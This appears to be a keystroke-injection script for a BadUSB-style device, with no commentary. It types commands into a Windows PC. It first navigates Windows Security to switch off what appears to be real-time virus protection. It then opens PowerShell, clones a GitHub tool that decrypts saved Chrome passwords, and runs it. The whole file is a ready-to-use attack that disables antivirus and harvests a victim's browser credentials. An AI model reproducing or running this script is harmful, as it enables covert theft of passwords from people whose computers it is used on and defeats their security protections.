layout('us');
typingSpeed(200,300);
press("GUI");
delay(1000);
type("virus & threat protection");
delay(2000);
press("ENTER");
delay(7000);
press("TAB");
delay(2000);
press("TAB");
delay(2000);
press("TAB");
delay(2000);
press("TAB");
delay(3000);
press("SPACE");
delay(2000);
press("LEFT");
delay(2000);
press("ENTER");
delay(2000);
combo("ALT F4");
delay(4000);
press("GUI r");
delay(1000);
type("powershell");
delay(2000);
press("ENTER");
delay(2000);
type("cls");
delay(2000);
press("ENTER");
delay(2000);
type("cd \"C:\\Users\\Dell\\Pictures\\Screenshots\\OneDrive\\Desktop\"");
delay(2000);
press("ENTER");
delay(2000);
type(" git clone https://github.com/ohyicong/decrypt-chrome-passwords.git");
delay(2000);
press("ENTER");
delay(7000);
type("cd decrypt-chrome-passwords");
delay(2000);
press("ENTER");
delay(2000);
type("python decrypt_chrome_password.py");
delay(2000);
press("ENTER");